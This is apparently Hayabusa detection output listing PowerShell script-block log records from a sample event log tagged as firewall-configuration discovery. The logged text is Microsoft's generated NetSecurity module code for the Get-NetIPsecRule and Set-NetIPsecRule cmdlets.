[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) 
$__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network 
Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', 
Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(Param",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 